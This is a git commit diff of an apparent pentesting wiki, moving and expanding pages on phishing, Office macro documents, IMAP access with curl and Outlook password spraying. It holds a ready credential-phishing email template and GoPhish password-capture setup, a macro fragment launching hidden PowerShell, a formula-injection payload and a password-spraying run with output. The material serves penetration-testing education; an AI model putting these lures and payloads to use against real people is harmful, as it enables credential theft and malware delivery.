GitBook: [master] 10 pages and 25 assets modified

This commit is contained in:
CPol 2020-12-21 17:07:56 +00:00 committed by gitbook-bot
parent bb53f8746b
commit b8bcd29dc7
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
25 changed files with 179 additions and 106 deletions

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 172 KiB

View file

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

View file

Before

Width:  |  Height:  |  Size: 93 KiB

After

Width:  |  Height:  |  Size: 93 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 93 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 93 KiB

After

Width:  |  Height:  |  Size: 23 KiB

View file

Before

Width:  |  Height:  |  Size: 798 KiB

After

Width:  |  Height:  |  Size: 798 KiB

View file

Before

Width:  |  Height:  |  Size: 5.2 KiB

After

Width:  |  Height:  |  Size: 5.2 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 37 KiB

View file

Before

Width:  |  Height:  |  Size: 112 KiB

After

Width:  |  Height:  |  Size: 112 KiB

View file

@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](.gitbook/assets/image%20%28182%29.png)
![](.gitbook/assets/image%20%28345%29%20%281%29.png)
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png)
InfluxDB

View file

@ -457,8 +457,9 @@
* [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md)
* [1911 - Pentesting fox](1911-pentesting-fox.md)
* [Online Platforms with API](online-platforms-with-api.md)
* [Phising Documents](phising-documents/README.md)
* [Phishing Methodology](phising-documents/README.md)
* [Detecting Phising](phising-documents/detecting-phising.md)
* [Phishing Documents](phising-documents/phishing-documents.md)
* [Reset/Forgoten Password Bypass](reset-password.md)
* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)

View file

@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
![](../../../.gitbook/assets/image%20%28211%29.png)
![](../../../.gitbook/assets/image%20%28254%29.png)
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png)
Because you will be able to call them

View file

@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](../.gitbook/assets/image%20%2825%29%20%281%29.png)
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%281%29.png)

View file

@ -93,50 +93,58 @@ From [here](https://donsutherland.org/crib/imap)
Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details.
1. Listing mailboxes (imap command `LIST "" "*"`)
```sh
1. Listing mailboxes \(imap command `LIST "" "*"`\)
```bash
$ curl -k 'imaps://1.2.3.4/' --user user:pass
```
2. Listing messages in a mailbox (imap command `SELECT INBOX` and then `SEARCH ALL`)
```sh
```
2. Listing messages in a mailbox \(imap command `SELECT INBOX` and then `SEARCH ALL`\)
```bash
$ curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
```
The result of this search is a list of message indicies.
```
Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
```sh
The result of this search is a list of message indicies.
Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
```bash
$ curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
```
```
A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
3. Downloading a message (imap command `SELECT Drafts` and then `FETCH 1 BODY[]`)
```sh
A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
3. Downloading a message \(imap command `SELECT Drafts` and then `FETCH 1 BODY[]`\)
```bash
$ curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
```
```
The mail index will be the same index returned from the search operation.
The mail index will be the same index returned from the search operation.
It is also possible to use `UID` \(unique id\) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
```sh
```bash
$ curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
$ curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass
```
Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the `-v` is required to see the subject and sender):
```sh
Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages \(the `-v` is required to see the subject and sender\):
```bash
$ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'
```
Although, its probably cleaner to just write a little for loop:
```
```text
for m in {1..5}; do
echo $m
curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done
```
## Shodan
* `port:143 CAPABILITY`

View file

@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28224%29.png)

View file

@ -1,42 +1,4 @@
# Phising Documents
Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.
The same internals and mechanisms apply to all software of the Microsoft Office Suite \(Excel, PowerPoint etc.\).
You can use the following command to check with extensions are going to be executed by some Office programs:
```bash
assoc | findstr /i "word excel powerp"
```
DOCX files referencing a remote template \(File Options Add-ins Manage: Templates Go\) that includes macros can “execute” macros as well.
### Word with external image
Go to: _Insert --&gt; Quick Parts --&gt; Field_
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: http://&lt;ip&gt;/whatever_
![](../.gitbook/assets/image%20%28347%29.png)
### Macros Code
```bash
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
```
## Autoload functions
The more common they are, the more probable the AV will detect it.
* AutoOpen\(\)
* Document\_Open\(\)
# Phishing Methodology
## Methodology
@ -82,7 +44,7 @@ The more common they are, the more probable the AV will detect it.
* [https://dnstwister.report/](https://dnstwister.report/)
* [https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/](https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/)
## GoPhish
## Configuring GoPhish
### Installation
@ -237,7 +199,7 @@ ss -l | grep "3333\|443"
service gophish stop
```
## SPAM filters bypass
## Configuring mail server and domain
### Wait
@ -331,6 +293,70 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
You can request your domain/IP to be removed at [https://sender.office.com/](https://sender.office.com/).
## Create & Launch GoPhish Campaign
### Sending Profile
* Set some **name to identify** the sender profile
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](../.gitbook/assets/image%20%2825%29.png)
### Email Template
* Set some **name to identify** the template
* Then write a **subject** \(nothing estrange, just something you could expect to read in a regular email\)
* Make sure you have checked "**Add Tracking Image**"
* Write the **email template** \(you can use variables like in the following example\):
```markup
<html>
<head>
<title></title>
</head>
<body>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">As you may be aware, due to the large number of employees working from home, the "PLATFORM NAME" platform is being migrated to a new domain with an improved and more secure version. To finalize account migration, please use the following link to log into the new HR portal and move your account to the new site: <a href="{{.URL}}"> "PLATFORM NAME" login portal </a><br />
<br />
Please Note: We require all users to move their accounts by 04/01/2021. Failure to confirm account migration may prevent you from logging into the application after the migration process is complete.<br />
<br />
Regards,</span></p>
WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
<p>{{.Tracker}}</p>
</body>
</html>
```
Note that **in order to increase the credibility of the email**, it's recommended to use some signature from an email from the client. Suggestions:
* Send an email to a **non existent address** and check if the response has any signature.
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
* Try to contact **some valid discovered** email and wait for the response
![](../.gitbook/assets/image%20%2861%29.png)
### Landing Page
* Write a **name**
* **Write the HTML code** of the web page. Note that you can **import** web pages.
* Mark **Capture Submitted Data** and **Capture Passwords**
* Set a **redirection**
![](../.gitbook/assets/image%20%2873%29.png)
{% hint style="info" %}
Usually you will need to modify the HTML code of the page and make some tests in local \(maybe using some Apache server\) **until you like the results.** Then, write that HTML code in the box.
Note that if you need to **use some static resources** for the HTML \(maybe some CSS and JS pages\) you can save them in _**/opt/gophish/static/endpoint**_ and then access them from _**/static/&lt;filename&gt;**_
{% endhint %}
{% hint style="info" %}
For the redirection you could **redirect the users to the legit main web page** of the victim, or redirect them to _/static/migration.html_ for example, put some **spinning wheel \(**[**https://loading.io/**](https://loading.io/)**\) for 5 seconds and then indicate that the process was successful**.
{% endhint %}
## Detecting the detection
Obviously one of the best ways to know if you have been busted is to **search your domain inside blacklists**. If it appears listed, somehow your domain was detected as suspicions.

View file

@ -0,0 +1,40 @@
# Phishing Documents
Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.
The same internals and mechanisms apply to all software of the Microsoft Office Suite \(Excel, PowerPoint etc.\).
You can use the following command to check with extensions are going to be executed by some Office programs:
```bash
assoc | findstr /i "word excel powerp"
```
DOCX files referencing a remote template \(File Options Add-ins Manage: Templates Go\) that includes macros can “execute” macros as well.
### Word with external image
Go to: _Insert --&gt; Quick Parts --&gt; Field_
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: http://&lt;ip&gt;/whatever_
![](../.gitbook/assets/image%20%28347%29.png)
### Macros Code
```bash
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
```
## Autoload functions
The more common they are, the more probable the AV will detect it.
* AutoOpen\(\)
* Document\_Open\(\)

View file

@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
Note the use of more constants
![](../../.gitbook/assets/image%20%28253%29.png)
![](../../.gitbook/assets/image%20%28253%29%20%281%29.png)
## CRC \(hash\)
@ -177,7 +177,7 @@ A CRC hash algorithm looks like:
The graph is quiet large:
![](../../.gitbook/assets/image%20%28207%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28207%29%20%282%29%20%281%29.png)
Check **3 comparisons to recognise it**:

View file

@ -74,43 +74,41 @@ apt-get install spray
spray -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPe
```
-------------------
## Outlook Web Access
There are multiples tools for password spraying outlook.
* With [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
* with [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
* With [Ruler](https://github.com/sensepost/ruler) (reliable!)
* With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
* With [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
* With [Ruler](https://github.com/sensepost/ruler) \(reliable!\)
* With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) \(Powershell\)
* With [MailSniper](https://github.com/dafthack/MailSniper) \(Powershell\)
To use any of these tools, you need a user list and a password / a small list of passwords to spray.
```sh
```bash
$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
[x] Failed: s.sven:Summer2020
[x] Failed: j.jenny:Summer2020
[x] Failed: t.teresa:Summer2020
[x] Failed: t.trump:Summer2020
[x] Failed: a.adams:Summer2020
[x] Failed: l.larsson:Summer2020
[x] Failed: CUBE0X0:Summer2020
[x] Failed: A.ADMIN:Summer2020
[x] Failed: C.CUBE:Summer2020
[+] Success: S.SVENSSON:Summer2020
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
[x] Failed: s.sven:Summer2020
[x] Failed: j.jenny:Summer2020
[x] Failed: t.teresa:Summer2020
[x] Failed: t.trump:Summer2020
[x] Failed: a.adams:Summer2020
[x] Failed: l.larsson:Summer2020
[x] Failed: CUBE0X0:Summer2020
[x] Failed: A.ADMIN:Summer2020
[x] Failed: C.CUBE:Summer2020
[+] Success: S.SVENSSON:Summer2020
```
## References :
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
- https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
- www.blackhillsinfosec.com/?p=5296
- https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
* www.blackhillsinfosec.com/?p=5296
* [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)